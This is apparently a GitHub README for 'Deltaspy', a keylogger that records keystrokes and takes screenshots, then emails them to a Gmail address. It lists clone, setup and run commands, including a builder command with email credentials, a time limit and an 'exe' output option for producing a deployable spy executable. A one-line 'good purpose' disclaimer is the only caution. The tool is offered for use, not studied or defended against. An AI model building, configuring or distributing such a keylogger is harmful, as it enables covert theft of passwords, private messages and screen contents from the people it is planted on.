Deltaspy
Deltaspy is a advanced keylogger which sends keylogs and screenshot to email
IT'S A TOOL DESIGNED FOR GOOD PURPOSE, DON'T USE IT ILLEGALLY.
HOW TO INSTALL
Cloning
git clone https://github.com/PraaneshSelvaraj/Deltaspy.git
Setup
cd Deltaspy
sudo su
python setup.sh
This installs all required dependencies.,
Note: Python will be installed on wine, enable add to path while installation
Running Deltaspy
python deltaspy.py
or
python delatspy.py --arm -email "your email" -pwd "your password" -time "time limit" -type "output type" -name "name of the file"
example:
python delatspy.py --arm -email [email protected] -pwd test -time 60 -type exe -name dspy
FEATURES
- Send logs
- Send Screenshot
- Sends to GMAIL
CONTRIBUTE
If there are any bugs, kindly report it on issues tab. If you want to contribute to this project, feel free to explore issues and code.